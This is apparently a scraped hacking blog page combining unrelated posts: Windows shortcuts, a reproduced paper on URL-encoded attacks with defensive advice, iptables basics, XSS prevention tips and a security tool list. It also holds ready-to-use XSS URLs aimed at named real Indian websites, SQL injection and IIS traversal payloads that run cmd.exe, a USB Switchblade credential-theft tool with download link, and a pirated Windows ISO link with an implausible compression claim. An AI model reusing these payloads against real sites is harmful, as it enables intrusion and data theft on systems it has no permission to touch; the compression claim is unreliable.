Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U
accessibility keyboard shortcuts:
Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U
shortcuts you can use with Windows Explorer:
Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW
Exploit Search Engine
Written by OpenMindLeader on 6:44 AMThis is a custom google search which searches for exploits from Milw0rm
http://www.google.com/coop/cse?cx=014701773107611585207:wkn4vzw5x4k
Extreme Compression
Written by OpenMindLeader on 6:42 AMI have a copy of Windows XP 64bit ISO (1.8 Gig) compressed into 8.9 MB.
I found the same copy under 10 MB !!
Download:
http://rapidshare.com/files/175685242/Windows_XP_64bit_6-in-1_DVD_warezguy.info_.rar
Back in the day a guy from DP forums compressed Windows Vista (few gigs) down to 1.2 MB and put it on a floppy.
The world record holder compressed GTA:San Andreas down to under 1MB (Took him 2 weeks of compressing)
As far as de-compression goes its not bad. The windows XP only takes about 2-3 min to decompress ...
Method? KGB !!! http://kgbarchiver.net/
URL Embedded Attacks
Written by OpenMindLeader on 6:03 AMWeb Browser Attacks
A popular misconception is that web hacking and defacement is difficult, often requiring detailed technical knowledge and specialist tools. Unfortunately, one of the best tools in a hacker’s arsenal is the common web browser. Using Microsoft’s Internet Explorer or Netscape’s Communicator, it is possible to identify and exploit many common vulnerability’s in both the remote web server’s hosting software and the site content, through simple URL editing. Over the last few years, the numbers of vulnerabilities and security flaws directly exploitable through this type of attack have increased phenomenally, primarily due to application developers failing to adequately check and decode the received client data.
A large proportion of these attacks could be prevented by understanding the methods for encoding data currently supported by popular Internet protocols (such as HTTP) and hosting applications (such as Microsoft’s Internet Information Server). In particular, an understanding of URL encoding techniques is required. In many resources, the usage of various terms like Unicode, web encoding, percent-encoding, escape-encoding and UTF encoding are used interchangeably. This document aims to enlighten developers and security administrators on the issues associated with URL encoded attacks. It is also important to note that many of the encoding methods and security implications are applicable to any application accepting data from a client system.
URI Encoding
Character Restrictions
Uniform Resource Indicators (URI) are a compact string of characters for identifying an abstract or physical resource, typically a web based Uniform Resource Locator (URL). Certain rules and standards have been established to ensure a constructed URI can be correctly interpreted by an application (for more information, read “Uniform Resource Identifiers (URI): Generic Syntax”, http://www.ietf.org/rfc/rfc2396.txt).
Traditional web applications transfer data between client and server using the HTTP or HTTPS protocols. There are essentially two methods in which a server receives input from a client; data can be passed in the HTTP headers (submitted through the cookie field, or the post data field) or it can be included in the query portion of the requested URL. When data is included in a URL, it must be specially encoded to conform to proper URL syntax.
The standard (rfc2396) defines the following classes of characters:
* Unreserved – Data characters that do not have a reserved purpose. These include upper and lower case characters, decimal digits, and a limited set of punctuation marks and symbols.
* Reserved – Data characters that could conflict with the correct interpretation of a URI. Refers to those characters that are allowed within a URI, but which may not be allowed within a particular segment of the generic URI syntax.
Class Characters
Unreserved a-z, A-Z, 0-9 and _ . ! ~ * ' ( )
Reserved ; / ? : @ & = + $ ,
When dealing with IPv6, it is advised that to use a literal IPv6 address in a URL, the literal address should be enclosed in "[" and "]" characters. If this is the case, it is recommended that the characters “[“ and “]” are moved from the “unwise” list to the reserved list (for more information, read “Format for Literal IPv6 Addresses in URL's” http://www.ietf.org/rfc/rfc2732.txt).
Escaped-encoding
Escaped-encoding, or sometimes referred to as percent-encoding, is the accepted method of representing characters within a URI that may need special syntax handling to be correctly interpreted. This is achieved by encoding the character to be interpreted with a sequence of three characters. This triplet sequence consists of the percentage character “%” followed by the two hexadecimal digits representing the octet code of the original character. For example, the US-ASCII character set represents a space with octet code 32, or hexadecimal 20. Thus its URL-encoded representation is %20.
Applications may automatically escape reserved and unreserved characters, or automatically un-escape an escape-encoded sequence within a URI, if there is potential for it to be incorrectly interpreted by the remote application. This conversion may be due to the position of the character or escape-encoded sequence within the URI. For example, "%7e" is sometimes used instead of "~" in an http URL path, but the two are equivalent for an http URL.
Because the percent "%" character always has the reserved purpose of being the escape indicator, it must be escaped as "%25" in order to be used as data within a URI. The RFC for URI encoding recommends that care should be taken not to escape or un-escape the same string more than once, since un-escaping an already un-escaped string might lead to misinterpreting a percent data character as another escaped character, or vice versa in the case of escaping an already escaped string.
Unreserved characters can be escaped without changing the semantics of the URI, but this should not be done unless the URI is being used in a context that does not allow the un-escaped character to appear.
The standard (rfc2396) defines the following groupings of characters that must be escaped to be included within a URI.
Grouping Characters
Control
Space
Delims < > # % "
Unwise { } | \ ^ [ ] `
Unicode-Encoding
Unicode was developed in a direct response to problems associated with multiple language implementations of the ASCII character set. In the past, due to the limited size of the standard ASCII character reference table, different languages could use the same reference number for different characters, or the same character may have been represented by multiple reference numbers. As expected, this led to various problems in the display and interpretation of data, as well as hundreds of different methods of encoding country specific characters. These problems were further compounded by the necessity to reference an expanded array of commonly used punctuation and technical symbols.
Unicode Encoding is a method of referencing and storing characters with multiple bytes by providing a unique reference number for every character no matter what the language or platform. It is designed to allow a Universal Character Set (UCS) to encompass most of the world's writing systems. Many modern communication standards (such as XML, Java, LDAP, JavaScript, WML, etc.), operating systems and web clients/servers use Unicode character values. Unicode (UCS-2 ISO 10646) is a 16-bit character encoding that contains all of the characters (216 = 65,536 different characters total) in common use in the world's major languages.
Unfortunately, the extended referencing system is not completely compatible with many old (albeit common) protocols and applications, and this has led to the development of a few UCS transformation formats (UTF) with varying characteristics. One of the most commonly utilised formats, UTF-8, has the characteristic of preserving the full US-ASCII range. It is compatible with file systems, parsers and other software relying on US-ASCII values, but it is transparent to other values.
UTF-8
In UTF-8, characters are encoded using sequences of 1 to 6 octets. The only octet of a "sequence" of one has the higher-order bit set to 0, the remaining 7 bits being used to encode the character value. In a sequence of n octets, n>1, the initial octet has the n higher-order bits set to 1, followed by a bit set to 0. The remaining bit(s) of that octet contain bits from the value of the character to be encoded. The following octet(s) all have the higher-order bit set to 1 and the following bit set to 0, leaving 6 bits in each to contain bits from the character to be encoded.
The table below summarizes the format of these different octet types. The letter x indicates bits available for encoding bits of the UCS-4 character value.
UCS-4 range (hex.) UTF-8 octet sequence (binary)
0000 0000-0000 007F 0xxxxxxx
0000 0080-0000 07FF 110xxxxx 10xxxxxx
0000 0800-0000 FFFF 1110xxxx 10xxxxxx 10xxxxxx
0001 0000-001F FFFF 11110xxx 10xxxxxx 10xxxxxx 10xxxxxx
0020 0000-03FF FFFF 111110xx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
0400 0000-7FFF FFFF 1111110x 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx 10xxxxxx
The UTF-8 translation has the following characteristics:
* Character values from 0000 0000 to 0000 007F (US-ASCII repertoire) correspond to octets 00 to 7F (7 bit US-ASCII values). A direct consequence is that a plain ASCII string is also a valid UTF-8 string.
* The first octet of a multi-octet sequence indicates the number of octets in the sequence.
* The octet values FE and FF never appear.
At the application level, earlier versions of HTML allowed the entire range of the ISO-8859-1 (ISO Latin-1) character set; the HTML 4.0 specification expanded to permit any character in the Unicode character set.
This encoding scheme may not seem overly clear, therefore consider the character “.” (dot) with the UCS-4 hexadecimal value of 0000 002E (which is 2E in US-ASCII). In UTF-8 encoding, this value can be represented in 6 different ways:
2E (00101110)
C0 AE (11000000 10101110)
E0 80 AE (11100000 10000000 10101110)
F0 80 80 AE (11110000 10000000 10000000 10101110)
F8 80 80 80 AE (11111000 10000000 10000000 10000000 10101110)
FC 80 80 80 80 AE (11111100 10000000 10000000 10000000 10000000 10101110)
Thus, the character may be represented with two bytes (C0 AE) by utilising the second UTF-8 level, three bytes (E0 80 AE) by utilising the third UTF-8 level, and so on to 6 bytes as indicated above.
Abuse of Encoding Schemes
URL-Encoding
A popular method of manipulating a web application for malicious ends is to extend the functionality of the URL in an HTTP or HTTPS request beyond that originally envisaged by the developer. Using a mix of escaped-encoding and Unicode character representation, it is often possible for an attacker to craft requests that may be interpreted by either the server or client environments as a valid application request. Even though certain characters do not need to be escape-encoded, any 8-bit code (i.e., decimal 0-255 or hexadecimal 00-FF) may be encoded. ASCII control characters such as the NULL character (decimal code 0) can be escape-encoded, as can all HTML entities and any restricted characters used by the operating system or database. In some cases, the encoding of URL information may be designed to purposefully disguise the nature of the attack.
Examples of typical URL-Encoded attacks
Cross-Site Scripting
Excerpt from an arbitrary web page - “getdata.php”: echo $HTTP_GET_VARS[“data”];
URL-Encoded attack: http://target/getdata.php?data=%3cscript%20src=%22http%3a%2f%2f
www.badplace.com%2fnasty.js%22%3e%3c%2fscript%3e
HTML execution:
SQL Injection
Original database query in the example file - “login.asp”: SQLQuery = “SELECT preferences FROM logintable WHERE userid=’” & Request.QueryString(“userid”) & “’ AND password=’” & Request.QueryString(“password”) & “’;”
URL-encoded attack: http://target/login.asp?userid=bob%27%3b%20update%20logintable%20set%20passwd
%3d%270wn3d%27%3b--
Executed database query: SELECT preferences FROM logintable WHERE userid=’bob’; update logintable set password=’0wn3d’;
Multiple Decoding
Various guidelines and RFC's carefully explain the method of decoding escape encoded characters and hint at the dangers associated with decoding multiple times and at multiple layers of an application. However, many applications still incorrectly parse escape-encoded data multiple times.
The significance of this form of attack is directly related to the order of decoding the escape-encoded URI, and when appropriate security checks are made on the validity of the URI data. For example, a commercial web server may originally decode all escape-encoded characters; part of the security verification may include the monitoring of “\..\” path recursion for sanity checking and to ensure that directory-path information does not expand beyond a defined limit. However, by escape-encoding this information multiple times, this security check may be circumvented on the initial decoding pass. If this information is then passed onto another application component, it may go through additional decoding, and result in an action not originally envisaged by the application developer.
The multiple escape-encoding of characters or sequences such as “\” or “..\” is particularly relevant in previously successful attacks against applications hosted on Microsoft Windows operating systems. Consider the character “\” as the escape-encoded sequence “%5c”. It is possible to further encode this sequence by escape-encoding each character individually ('%' = %25, '5' = %35, 'c' = %63), and combining them together in multiple ways or multiple times. For example:
* %255c
* %%35c
* %%35%63
* %25%35%63
* etc.
Thus, the sequence “..\” may be represented by “..%255c”, “..%%35c” or other permutation. After the first decoding, the sequence “..%255c” is converted to “..%5c”, and only in the second decoding pass is the sequence is finally converted to “..\”.
Example of a multiple decoding attack
Microsoft IIS Double Decode
When loading an executable CGI program, IIS will decode twice. First, CGI filename will be decoded to check if it is an executable file (for example, '.exe' or '.com' suffix check-up). Successfully passing the filename check-up, IIS will run another decode process. Normally, only CGI parameters should be decoded in this process. But this time IIS mistakenly decodes both CGI parameters and the decoded CGI filename. In this way, CGI filename is decoded twice by error.
(Visit http://www.microsoft.com/technet/security/bulletin/MS01-026.asp for more information)
Multiple decode attack: http://TARGET/scripts/..%255c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\
Host execution: dir c:\ (the directory list of C:\ is revealed)
Unicode Attacks
Describing how a Unicode attack functions, and why the resultant character string may be successful, is a difficult task due to the extreme variety and resulting complexity of the of Unicode-encoding. Three issues are prevalent; Character Mapping, Character Encoding, and how an application supports character mapping and encoding.
* The UTF-8 sequence for a character may take one of six different representations. Consider the “.” (dot) described earlier represented as 2E, C0 AE, E0 80 AE, F0 80 80 AE, F8 80 80 80 AE, or FC 80 80 80 80 AE.
* The UTF-8 sequence may contain not invalid values such as FE and FF. Further information on invalid values can be found at http://www.unicode.org/versions/corrigendum1.html.
In most circumstances, Unicode attacks have been successful due to poor security validating of the UTF-8 encoded character or string, and the interpretation of illegal octet sequences. Consider the following:
* An application may prohibit the use of the NUL character when parsed the single octet 00, but allow the illegal two-octet sequence C0 80 and interpret it as a NUL.
* An application may use a “short-cut” when decoding UTF-8, and only decode the six least significant bits. The two most significant bits, normally “10”, may also be replaced with “00”, “01” or “11”. Thus the “.” (dot) may be represented as C0 AE, C0 2E, C0 6E and C0 EE.
11000000 10101110 (C0 AE),
11000000 00101110 (C0 2E),
11000000 01101110 (C0 6E),
11000000 11101110 (C0 EE).
* Various application components may prohibit the use of the string “..\” and the corresponding single octet sequence 2E 2E 5C, yet permit the illegal octet sequence 2E C0 AE 5C.
In the majority of attacks, Unicode data will be escape-encoded for inclusion within the requested URL. Depending upon the application receiving the encoded request, a successful attack may be made using valid or invalid URL encoding.
* Valid URL encoding refers to the escape-encoding of each UTF-8 sequence octet. For example, the “/” (forward slash) UTF-8 sequence could be encoded as %C0%AF.
* An invalid URL encoding refers to the use of non-hexadecimal digits that may be incorrectly interpreted as an alternative, but valid, hexadecimal digit. For example, %C0 is interpreted as the character number (‘C’ - ‘A’ + 10 ) ×16 + (‘0’ – ‘0’) = 192. Applying the same algorithm for alternative representations:
%BG yields, (‘B’ – ‘A’ + 10) × 16 + (‘G’ – ‘0’) = 192
%S0 yields, (‘S’ – ‘A’ + 10) × 16 + (‘0’ – ‘0’) = 448, which, when represented as a single byte (8 significant bits), yields 192.
%QF yields, (‘Q’ – ‘A’ + 10) × 16 + (‘F’ – ‘0’) = 431, which, when represented as a single byte (8 significant bits), yields 175. Corresponding to %AF.
Thus, if the application’s algorithm will accept non-hexadecimal digits (such as ‘S’), then it may be possible to have variants for %C0 such as %S0 and %BG. In the case of the “/”, it is possible to represent the character as %C0%AF or %BG%QF for example.
Example of a Unicode attack
Unicode Web Server Folder Traversal
Very similar to the Microsoft IIS double decode vulnerability mentioned previously. However, this time the double decode value %255c can be substituted for a variety of Unicode representations of the ‘\’ or ‘/’ characters such as %c0%af, %c1%9c, %c1%pc, %c0%qf, %c1%8s, %c1%1c, %c1%af, and %e0%80%af. The selection of a successful Unicode representation of ‘\’ and ‘/’, based upon the language character set installed and running on the host.
(Visit http://www.microsoft.com/technet/security/bulletin/MS00-078.asp for more information)
Unicode attack: http://TARGET/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Host execution: dir c:\ (the directory list of C:\ is revealed)
%u Encoding
An application that supports %u encoding gains the ability to represent the full range of Unicode character strings, beyond those normally available through escape-encoded UTF-8. At the present time, %u encoding is not a recognised standard. However, Microsoft’s IIS Web server is one such application that supports %u encoding.
The %u encoding schema takes the form “%u0061” for UTF-8 character “a”, where the value after %u is the full Unicode value of the character. As previously discussed, the Unicode language code for UTF-8 is 00. Thus, for comparison, the character “Δ” under Basic Greek (03) would be represented as %u0394, and the character “♂” under Miscellaneous Symbols (26) would be represented by %u2642.
Attacks using this method of encoding character strings have been successful in the past largely due to perimeter defence systems (e.g. content filtering) and intrusion detection systems (IDS) not being aware of the encoding system, and therefore not decoding it.
Example of a %u Encoded attack
IDS Evasion of .ida buffer overflow
The CodeRed worm used the .ida buffer overflow vulnerability to be able to exploit systems to propagate. CodeRed was detected because IDS systems had signatures for the .ida attacks. However if CodeRed would have had a polymorphic %u encoding mechanism then it would have easily slipped past most IDS systems because they detected the .ida attack by looking for ".ida" (or any .ida signature string) in a web request. So if an attacker sent a %u encoded request then they could bypass IDS's checking for ".ida".
(Visit http://www.eeye.com/html/Research/Advisories/AD20010705.html and http://www.microsoft.com/technet/security/bulletin/ms01-033.asp for more information)
%u encoded attack: http://TARGET/scripts/default.id%u0061?[buffer]=X where [buffer] is approximately 240 bytes
Obfuscating an IP Address
Most Internet users are familiar with navigating to sites and services using a fully qualified domain name, such as www.iss.net. For an application to communicate over the Internet (and most internal networks), this address must to be resolved to an IP address, such as 209.134.161.35 for www.iss.net. This resolution of IP address to host name is achieved through domain name servers.
An attacker may wish to use the IP address as part of a URI to obfuscate the host and possibly bypass content filtering systems, or hide the destination from the end user. Although many IT professionals are familiar with the classic dotted-decimal representation of IP addresses (000.000.000.000), most are not familiar with other possible representations. Using these other IP representations within an URI, it may be possible obscure the host destination from many automated defence systems.
Other representations of an IP address
Depending on the application interpreting an IP address, there may be a variety of ways to encode the address other than the classic dotted-decimal format. Alternative formats include:
* “Dword” - meaning double word because it consists essentially of two binary "words" of 16 bits; but it is expressed in decimal (base 10),
* “Octal” - address expressed in base 8, and
* “Hexadecimal” - address expressed in base 16.
These alternative formats are best explained using an example. Consider the URI http://www.iss.net/, which resolves to 209.134.161.35. This can be interpreted as:
* decimal – http://209.134.161.35/
* “dword” – http://3515261219/
* “octal” – http://0321.0206.0241.0043/
* “hexadecimal” – http://0xD1.0x86.0xA1.0x23/ or http://0xD186A123/
In some cases, it may be possible to mix formats (e.g. http://0321.0x86.161.0043).
A dot-less IP calculator can be found at http://www.tcp-ip.nu/cgi-bin/tcp-ip/calc.cgi.
Further representations of the dot-less “Dword” IP address can be achieved by adding multiples of 4294967296. For example, the following addresses all resolve to 209.134.161.35:
* 3515261219
* 7810228515
* 12105195811
* 16400163107
IPv6 Addressing
IP version 6 (IPv6) is a new version of the Internet Protocol designed as a successor to IP version 4 (IPv4) (for information on IPv4 visit http://www.ietf.org/rfc791, and http://www.ietf.org/rfc/rfc1883.txt for IPv6). The most interesting change lies in the increase in the IP address size from 32 bits to 128 bits, and the associated changes in representing this addressing. There are three conventional forms for representing IPv6 addresses as text strings:
* The preferred form is x:x:x:x:x:x:x:x, where the 'x's are the hexadecimal values of the eight 16-bit pieces of the address. Where it is not necessary to write the leading zeros in an individual field.
* Due to some methods of allocating certain styles of IPv6 addresses, it will be common for addresses to contain long strings of zero bits. In order to make writing addresses containing zero bits easier a special syntax is available to compress the zeros. The use of "::" indicates multiple groups of 16-bits of zeros. The "::" can only appear once in an address. The "::" can also be used to compress the leading and/or trailing zeros in an address.
* An alternative form that is sometimes more convenient when dealing with a mixed environment of IPv4 and IPv6 nodes is x:x:x:x:x:x:d.d.d.d, where the 'x's are the hexadecimal values of the six high-order 16-bit pieces of the address, and the 'd's are the decimal values of the four low-order 8-bit pieces of the address (standard IPv4 representation).
This formatting of IPv6, and support for IPv4 addresses, enables an IP address to be further obscured to a casual observer and many automated detection systems that do not correctly identify and process IPv6 formatted requests. Examples of the IPv6 formatting options are included in the following table. It is worth noting that, when using an IPv6 address in a URL, the literal address should be enclosed in "[" and "]" characters (for more information, read “Format for Literal IPv6 Addresses in URL's” http://www.ietf.org/rfc/rfc2732.txt).
Literal IPv6 addresses URL Representation Samples
FEDC:BA98:7654:3210:FEDC:BA98:7654:3210 http://[FEDC:BA98:7654:3210:FEDC:BA98:7654:3210]:80/index.html
1080:0:0:0:8:800:200C:4171 http://[1080:0:0:0:8:800:200C:417A]/index.html
3ffe:2a00:100:7031::1 http://[3ffe:2a00:100:7031::1]
1080::8:800:200C:417A http://[1080::8:800:200C:417A]/foo
::192.9.5.5 http://[::192.9.5.5]/ipng
::FFFF:129.144.52.38 http://[::FFFF:129.144.52.38]:80/index.html
2010:836B:4179::836B:4179 http://[2010:836B:4179::836B:4179]
A Defensive Strategy
URL-encoding Advice
It is evident that the use of the character encoding schemes previously discussed can offer an attacker an almost infinite number of ways to encode an attack. Detecting an attack using common signature matching techniques can range from being tedious, through to almost impossible. Thus, much of the responsibility for defending against such encoded attacks lies with the application developers themselves. Many past successful attacks and application vulnerabilities could have been averted by the following security practices:
* Read the RFC’s on the correct syntax for processing of URL, Unicode and applicable encoding schemes thoroughly. Many skilled and experienced people have written, reviewed and revised this information over the years. In doing so, it is often possible to avoid many of the security pitfalls, and associated vulnerabilities, commonly encountered with a specific application type.
* When client input is required from web-based forms, avoid using the “GET” method to submit data, as the method causes the form data to be appended to the URL and is easily manipulated. Instead, use the “POST method whenever possible.
* Whatever method is used for submitting client data, it is often a trivial task for an attacker to manipulate the content. Thus client-side content checking should never be relied upon. All data should be re-validated and sanitized at the receiving server to ensure the data is correct and has not been tampered with.
* When data is submitted to a server, always limit the type of acceptable data as much as possible by using strict validation rules. Programmatically, always ensure that the default data processing rule is “fail” - only accept the data if it is of the correct type, falls within the specified bounds (minimum and maximum lengths) and contains expected content.
* Do not assume that the application or operating system hosting the custom developed software or pages, will correctly decode escape-encoded or Unicode data. Always perform independent validation and sanity checking of the supplied data.
* Ensure that the custom application does not repeat any character-decoding processes that should have been carried out by the hosting application or operating system. If the data remains encoded, or contains unacceptable characters, treat the data as having failed, and deal with accordingly.
* Any security checks should be completed after the data has been decoded and validated as acceptable content (e.g. maximum and minimum lengths, correct data type, does not contain any encoded data, textual data only contains the characters a-z and A-Z etc.)
* There is no substitute for testing. Thoroughly test the custom applications responses to encoded and incorrect data formats. Various tools and scripts are available on the Internet to aid this process. For example, a good script for verifying the correct interpretation of UTF-8 encoded characters can be found at http://www.cl.cam.ac.uk/~mgk25/ucs/examples/UTF-8-test.txt.
* Be aware of alternative methods of encoding data, especially those supported by the applications host environment. This is particularly true in the methods available for encoding or obfuscating IP address information.
XSS in few indian sites
Written by OpenMindLeader on 1:59 AMhttp:www.finance.indianmart.com
http://www.taxindiaonline.com
Both iframe and alert works in this site too.
example 1:
example 2:
http://www.iob.in
example 1:
example 2:
http://www.tatindicom.com
example 1 :
http://www.tataindicom.com/search.aspx?x=17&y=11&SearchType=exact&SearchTerm=%3Cscript%3Ealert%28%22xss3d+by+siD3^effectS%22%29%3C%2fscript%3E
example 2:
http://www.tataindicom.com/search.aspx?SearchTerm=%3Ciframe+src%3Dhttp%3A%2F%2Fwww.amsecure.blogspot.com%3E&x=0&y=0
Monday, November 24, 2008 A customer in Anchorage, Alaska had his phone stolen, luckily he had installed GadgetTrak Mobile Security on the device.
Written by OpenMindLeader on 7:45 AMA customer in Anchorage, Alaska had his phone stolen, luckily he had installed GadgetTrak Mobile Security on the device. Today he has his stolen phone back and the mobile thief is behind bars. Here is is his story:
I own an AT&T Tilt. Recently it was stolen, 3 days later the thief was in jail and I had my phone back. I was working out at the Alaska Club and some one broke into my locker and stole everything I had in there, my wallet, car keys, cell phone, and a birthday present that I had bought for my 2 year old son.
Prior to all of this I had purchased GadgetTrak, and had it installed to my AT&T Tilt cell phone. I had set up the software and everything so that it would alert my wife as well as my more “private” email account when ever it was turned on.
I gave the information to the Anchorage Police Department that I was getting from the phone (via SMS) to my email account, as well as the GPS positioning of the phone, and the APD was able to locate and collect my phone from the thief as well as arrest him. We are now awaiting our court date to finalize the charges. Sadly the APD was not able to recover the birthday present that I had bought for my son, but at least they were able to put another THIEF behind bars where they belong.
According to the thief he had no idea that the phone was being tracked. The APD has linked him to several other thefts from other Alaska Club locations.
The ONLY reason I am endorsing this product is that it worked, I got my phone back, and the person that stole it was arrested.
Sony USB thumb drives installs Rootkit
Written by OpenMindLeader on 7:42 AMSo, it appears Sony did not learn from their little rootkit lesson back in 2005 when they installed trojan like behavior to protect digital rights on their CDs. Now it appears that lines of Sony’s Micro Vault line has crossed the line yet again. When the built in fingerprint reader installs a driver which hides a directory under c:\windows\. This directory and any files within are hidden when viewing files and subdirectories in the Windows directory. This driver then opens up a way for malware to sneak into that system as if you know the name of the directory you can sneak other files into it thus hiding them as well, not only does this hide the file from the user, but also from anti-virus scanners.
Not exactly complex stuff, but it is interesting to see that even commercial companies are relying on “USB hacks” to implement security mechanisms, the downside here however is that it can open the customer’s system up to malware. Sony has promised to release a fix…however it is not ready yet.
USB HACK:Endpoint Insecurity
Written by OpenMindLeader on 7:35 AMUSB stands for "universal serial bus" and nowadays USB is playing an important role in everyone's life.Most of us prefer USB instead of cds/dvds.But hackers have created another tool in USBs called USB Switchblade .
It takes advantage of various Microsoft Windows security vulnerabilities, the majority of which are related to USB ports.
The primary purpose of this tool is to silently recover information from Windows systems, such as password hashes, LSA secrets, IP information as well as browser history and autofill information as well as create a backdoor to the target system for later access. The tool through community development ended up creating a Frankenstein application that exposed some very serious security vulnerabilities in Windows, particulary with regards to removable media devices.
The tool takes advantage of a security hole in U3 drives that allows the creation of a virtual CD-ROM drive, whicn allows the Windows autorun feature to work (unless disabled on the target system). Even if autorun or a U3 drive is not used, the application can still be started by executing a single script on the drive.
The most damaging feature of this tool is the ability to extract the passwords hashs from the target system and load them onto the drive for later cracking through the use of Rainbow tables. The weakness of Windows LM hashes is farily well known. With this application installed on a U3 drive it would only take a few seconds for someone with malicious intent to plug in the drive to an open USB port on a system and walk away with the passwords for that system.
The application also finds browser history (for both IE and Firefox) including autofill information (exposing website passwords etc), as well as AIM and MSN Messenger passwords. It will also reveal product keys for some applications (mostly Microsoft applications).
The tool will also create a ghost admin account, which can function as a back door to the system if it is not behind a firewall.
The tool has evovled in the last month or so to include mulitple version including a way to circumvent anti-virus protection that would usually detect some of the malicious exectubles. Additional files were also added to check the vulnerabilities listing all security and patches installed to the target system, as well as another which will start a VNC service silently in the background.
Downloads ::
USE THESE PROGRAMS AT YOUR OWN RISK! THESE APPLICATIONS ARE FOR EDUCATIONAL PURPOSES ONLY AND SHOULD NEVER BE USED ON A PRODUCTION SYSTEM.
http://www.usbhacks.com/2006/10/07/usb-switchblade/
How To Start iptables
Written by OpenMindLeader on 7:09 AMYou can start, stop, and restart iptables after booting by using the commands:
[root@bigboy tmp]# service iptables start
[root@bigboy tmp]# service iptables stop
[root@bigboy tmp]# service iptables restart
To get iptables configured to start at boot, use the chkconfig command:
[root@bigboy tmp]# chkconfig iptables on
Determining The Status of iptables
You can determine whether iptables is running or not via the service iptables status command. Fedora Core will give a simple status message. For example
[root@bigboy tmp]# service iptables status
Firewall is stopped.
[root@bigboy tmp]#
Packet Processing In iptables
All packets inspected by iptables pass through a sequence of built-in tables (queues) for processing. Each of these queues is dedicated to a particular type of packet activity and is controlled by an associated packet transformation/filtering chain.
There are three tables in total. The first is the mangle table which is responsible for the alteration of quality of service bits in the TCP header. This is hardly used in a home or SOHO environment.
The second table is the filter queue which is responsible for packet filtering. It has three built-in chains in which you can place your firewall policy rules. These are the:
* Forward chain: Filters packets to servers protected by the firewall.
* Input chain: Filters packets destined for the firewall.
* Output chain: Filters packets originating from the firewall.
The third table is the nat queue which is responsible for network address translation. It has two built-in chains; these are:
* Pre-routing chain: NATs packets when the destination address of the packet needs to be changed.
* Post-routing chain: NATs packets when the source address of the packet needs to be changed
Iptables
Written by OpenMindLeader on 7:08 AMOriginally, the most popular firewall/NAT package running on Linux was ipchains, but it had a number of shortcomings. To rectify this, the Netfilter organization decided to create a new product called iptables, giving it such improvements as:
* Better integration with the Linux kernel with the capability of loading iptables-specific kernel modules designed for improved speed and reliability.
* Stateful packet inspection. This means that the firewall keeps track of each connection passing through it and in certain cases will view the contents of data flows in an attempt to anticipate the next action of certain protocols. This is an important feature in the support of active FTP and DNS, as well as many other network services.
* Filtering packets based on a MAC address and the values of the flags in the TCP header. This is helpful in preventing attacks using malformed packets and in restricting access from locally attached servers to other networks in spite of their IP addresses.
* System logging that provides the option of adjusting the level of detail of the reporting.
* Better network address translation.
* Support for transparent integration with such Web proxy programs as Squid.
* A rate limiting feature that helps iptables block some types of denial of service (DoS) attacks.
Considered a faster and more secure alternative to ipchains, iptables has become the default firewall package installed under RedHat and Fedora Linux.
XSS
Written by OpenMindLeader on 7:46 PMSSL and HTTPS doesnt mean your site is secured.This is one example to show you guyz how xss is powerful...
Few Top Network Security
Written by OpenMindLeader on 8:25 PMYo guyz am gonna post some of ma top favorite security tools
1: Nessus Its an open source network vulnerability scanner until they closed the source code in 2005 because many were misusing it.
Download :http://www.nessus.org/download/
2:Wireshark (known as Ethereal once)open source network protocol analyzer for Unix and Windows. It allows you to examine data from a live network or from a capture file on disk
Download : http://www.wireshark.org/download.html
3:Snort again is a open source IDS is everyone's favorite.Snort detects thousands of worms, vulnerability exploit attempts, port scans, and other suspicious behavior.
Download :http://www.snort.org/downloads
4:Metasploit took the security world by storm when it was released in 2004. No other new tool even broke into the top 15 of this list, yet Metasploit comes in at #5, ahead of many well-loved tools that have been developed for more than a decade. It is an advanced open-source platform for developing, testing, and using exploit code.
download :http://www.metasploit.com/
5:Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. It identifies networks by passively sniffing
Download :http//www.kismetwireless.net/download.shtml
6:Cain and Abel the top password recovery tool for Windows
Download :http://www.oxid.it/cain.html
Defense against XSS attacks
Written by OpenMindLeader on 8:08 PMhe best defense against XSS attacks is good filtering of input.
If you allow users to send messages to each other, for example, you really must filter all input from the sender to make sure it's secure.
In some cases this might be obvious, but consider the case where you allow a user to input a website URL on their profile pages:
Some sites will allow you to enter a URL, then they will display it as a clickable link such as:
URI
If you don't filter spaces from the input, and quote marks, a user can abuse this to be malicious by giving http://foocome" onMouseOver="alert(hello) as input. This leads to the malicious
http://foocome" onMouseOver="alert(document.cookie)
Prevent XSS Attaks
Written by OpenMindLeader on 8:05 PMWhat are XSS Attacks?
XSS attacks are attacks that target the end user instead of your actual site. Vulnerable web applications that don't check or sanitize incoming data let arbitrary code to run on a client computer (such as Javascript). The end result can be anything from stealing cookie data or redirecting to a different site, to embedding a browser exploit on a page. Anything that can be done with Javascript (a lot!) can be done if your application is vulnerable.
How do I Prevent XSS Attacks?
To prevent XSS attacks, you just have to check and sanitize all user inputted data that you plan on using.
For starters, disallow all HTML. Use htmlspecialchars() to convert HTML characters into HTML entities. So characters like < and > that mark the beginning/end of a tag are turned into < and >. It is not enough to simply use strip_tags() to only allow some tags as the function does not strip out harmful attributes like the onclick or onload. Even an innocent looking tag can contain some nasty code.
